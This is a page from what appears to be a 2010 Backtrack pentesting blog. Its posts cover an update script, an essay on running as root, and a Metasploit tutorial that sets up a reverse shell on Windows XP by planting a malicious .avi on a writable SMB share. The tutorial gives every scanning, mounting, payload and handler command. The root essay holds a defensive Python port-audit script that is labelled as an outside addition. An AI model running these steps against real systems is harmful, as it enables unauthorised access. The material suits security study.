Thursday, November 18, 2010

Update_bt.py script.

Well, I recently started learning Python, and at first I just wanted to see if I could write a basic update script; this is what came out of it.

Hope you like it. I would also appreciate some suggestions about what else it should contain.
It includes an internet connectivity check.
This script currently:
* Upgrades/Cleans Backtrack
* Exploits: Metasploit 2 and 3, Exploit-db, SET, FastTrack
* Vulnerability Scanners: OpenVAS, Nikto, W3AF, Nessus (if you have it)
* Wireless: Aircrack, Airodump, Kismet, Gerix

Each of the sections above gets its own menu in the script.

EDIT: Well, I have taken into consideration the suggestions I received via PM, so I rewrote the script and included categories and more tools; here you go:

bt_up.tar.gz

Wednesday, September 8, 2010

Running as root !?

OK, so a lot of you like using Backtrack, and now that it's Debian based and can be used as a daily OS, things have changed a bit.

Now, as you know, there are a few guides on how to make an unprivileged user in Backtrack:
Unprivileged user in BT
Normally it's good to create an unprivileged user, but I must remind you that Backtrack is not a normal OS: most of its applications must be run as root, and it was basically made to run as root and nothing else.
If you ask people whether it's OK to run as root, you will get an answer similar to this one: "It's not safe to run as root!" But did anyone tell you why, or when it is safe to run as root?

I'm going to try to clarify the risks and everything else regarding "running as root".
Keep in mind that what I am saying here applies to normal desktop PCs or laptops, not servers.

OK, so let's begin:

Running as root has a bright side as well as a dark side:

***BRIGHT SIDE***

As you know, the "root" account on a *nix system is the most privileged account. This account allows you to do anything you want without asking questions: changing passwords, installing applications, adding accounts, etc. The computer does not hassle you with confirmations and questions because it assumes you know what you are doing ... so if you don't, log out now!
This is a good thing because it does not make you type sudo for everything, which gets annoying after a while.

***DARK SIDE***

Now, a lot of people are afraid to run as root because they might break something ... and this is true: if you run as root and have no clue what you are doing, you might end up with 3 reinstalls per day.
Running as root is not for everyone; you need some advanced skills in using bash plus some advanced knowledge about *nix. Oh, and if you can't play in bash without typing "rm -rf /*" every 20 seconds, then close this window and stop reading, for your own safety.

So, bottom line: if you are not sure you can handle it and don't want to accidentally lose your important data, don't run as root.

Another thing about running as root: people often say that you should not run as root for security reasons, and this is also true. If an attacker gets hold of your system he will be root and could do anything with your PC. But now I ask you ... how many services do you need running 24/7 on your home PC/laptop?

Sure, there are other ways of getting access to your system. If you are on a LAN with others, they could try a MITM and maybe sniff your credentials, but there are programs to protect you from this kind of attack; you can even use ettercap or arpwatch for this, and I'm sure if you google these things you will come up with something.
Other methods would be to set up an evil server with metasploit or SET and trick you into clicking it, or to send you an email with a malicious .pdf, or whatever. Now, if you know you would click every link people give you and open every attachment in your email without scanning it ... close the window NOW!

These are some of the security risks that you need to be aware of when running as root.
Oh, and one last thing: don't think that if you're not running as root you are completely bulletproof!
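The post's question ("how many services do you need running 24/7?") is worth answering with data rather than a guess. As an added example, not the blog's own code, here is a small Python audit that parses /proc/net/tcp on a Linux box, lists the listening sockets together with the UID that owns them, and flags root-owned services reachable from the network, which is the case that matters most when the whole desktop runs as root. The sample table below is constructed, not captured from a real machine; when run on Linux the script reads the live table instead.

```python
import socket
import struct

# Constructed sample in /proc/net/tcp layout (not captured from a real machine).
# Row 0: 0.0.0.0:22 owned by root (uid 0), state 0A = LISTEN; row 1: 127.0.0.1:631
# owned by uid 1000, LISTEN; row 2: an established connection (state 01) to skip.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1
   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12346 1
   2: 0100007F:A3E4 0100007F:0016 01 00000000:00000000 00:00000000 00000000     0        0 12347 1
"""
LISTEN = "0A"  # kernel state code for a listening TCP socket

def decode_ipv4(hex_addr):
    """The kernel prints IPv4 addresses as little-endian hex; convert back to dotted quad."""
    return socket.inet_ntoa(struct.pack("<I", int(hex_addr, 16)))

def parse_listeners(proc_net_tcp_text):
    """Return (address, port, uid) for every LISTEN row of /proc/net/tcp-style text."""
    listeners = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # line 0 is the column header
        fields = line.split()
        if len(fields) < 8 or fields[3] != LISTEN:
            continue
        addr_hex, port_hex = fields[1].split(":")
        listeners.append((decode_ipv4(addr_hex), int(port_hex, 16), int(fields[7])))
    return listeners

def classify(addr, uid):
    """A root-owned service reachable from the network is the case the post warns about."""
    exposed = addr != "127.0.0.1"
    if uid == 0 and exposed:
        return "HIGH: root-owned and reachable from the network"
    if exposed:
        return "MEDIUM: reachable from the network, unprivileged owner"
    return "LOW: local only"

def audit(proc_net_tcp_text):
    """Map 'addr:port' to its rating so the result can be checked as well as printed."""
    return {f"{a}:{p}": classify(a, u) for a, p, u in parse_listeners(proc_net_tcp_text)}

if __name__ == "__main__":
    try:  # on a live Linux box, audit the real table; elsewhere fall back to the sample
        with open("/proc/net/tcp") as f:
            text = f.read()
    except OSError:
        text = SAMPLE_PROC_NET_TCP
    for sock, rating in audit(text).items():
        print(sock, rating)
```

Every HIGH line is a service that hands root to whoever finds a bug in it, so the fewer of them on a desktop that runs as root, the better.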

Saturday, September 4, 2010

Sickness - Owning a windows xp with metasploit.

OK, so first of all, I did not do any video editing, so don't complain about it!
Second, excuse me if I made some English mistakes; I'm not a perfect English speaker.
Third, this is a basic video.

So in this tutorial I am going to show you how to own a Windows XP SP2 machine that has its "My Documents" folder shared with read/write permissions, by uploading an infected .avi file to the victim's machine.

The tools used: fping, nmap, metasploit, inguma

Commands:
Code:

fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls

Metasploit commands (making the infected .avi):
Code:

search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit

Metasploit handler:
Code:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit

Code:

cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media

Wednesday, September 1, 2010

Backtrack Products.

Well, it seems like my 3-4 month signature on the Backtrack forum, "I want a Backtrack T-Shirt!", finally paid off.
This morning archangelamael told me that I could buy one, along with a lot more Backtrack accessories, but why not take a look yourself:

Backtrack Shop

Monday, August 30, 2010

16 songs for evil hax0rz !!!

OK, so rule number 1: "If you want to be an evil hax0r you have to listen to good music!" So here is a list of songs for hax0rz, with YouTube links:

1. Mushroomhead - Sun Doesn't Rise (searching Google)
2. Mushroomhead - Solitaire Unraveling (Nmap scan)
3. Infected Mushroom - Heavyweight (Nessus & NeXpose)
4. The Qemists - Stompbox (Spor Remix) (putting info together)
5. Mt Eden Dubstep - Prodigy: Omen (found a nice vulnerability)
6. In Flames - My Sweet Shadow (when you are bruteforcing)
7. In Flames - Cloud Connected (wireless cracking)
8. Megadeth - Symphony of Destruction (buffer overflow) MEGADETH RULZZZ
9. Megadeth - Trust (sniffing) THEY RULE AGAIN :X
10. Pantera - Walk (pivoting)
11. Children of Bodom - Angels Don't Kill (preparing for a social engineering attack)
12. Soilwork - Nerve (cracking a hash)
13. Metallica - Fade to Black (when your internet connection drops) Metallica rule 2!!
14. AC/DC - Back in Black (especially for blackhats)
15. AC/DC - Stiff Upper Lip (after a successful pentest)
16. Disturbed - Pain Redefined (when you present the pentest report and show the world how evil you are!)

The songs are not in order of preference; their order is random.
If you know more songs, feel free to comment here with a YouTube link and the "moment" for listening to it!

Blog status updated !!

OK, as you have all seen, lately I haven't posted a lot, and there is a reason for that: I was on vacation and did not take anything related to technology with me.

Well, now that I am back, things will change. I've already prepared some nice posts and started remaking the tutorials and editing them properly, and I have also been submitting my tutorials to Securitytube, so hopefully there will be more video tutorials for you to watch.

However the first priority is to finish remaking my tutorials.

Oh, and one last thing: I appreciate your comments and visits, and I hope I can post more stuff that you guys like!

.NET vs Java programmers !

A group of 4 Microsoft .NET programmers and a group of 4 Java programmers are going on a train to an expo. The MS programmers buy a ticket each, and then watch the Java programmers proceed to buy one ticket between them.

The MS programmers are intrigued, and when they get on the train, they watch the Java programmers to see what they do when the guard comes to check the tickets. It turns out that, before the guard comes, they all cram into the toilet. The guard knocks on the door and asks for the ticket. The guard takes it from under the door and slides it back.

The MS programmers are all impressed, so on the way back they buy only one ticket, only to watch the Java folks get on the train without buying a ticket at all.

When they get on the train, the MS people cram into the toilet, as they saw the Java folks do on the earlier journey. The Java programmers then knock on the door and say "Ticket please". The MS programmers slide the ticket under the door, as they saw the Java programmers do earlier.

"Thank you", they say. "You steal our methods, but you don't understand them."

Friday, August 27, 2010

Metasploit Unleashed – Updates

So I guess the rumors are true :) the Metasploit Unleashed course will be updated on a monthly basis.
We can expect a whole lot of new content to be added to the Metasploit Unleashed Wiki in the next few months; for now they have added 9 new sections.

You can find the course at: Metasploit_unleashed
Source: www.offensive-security.com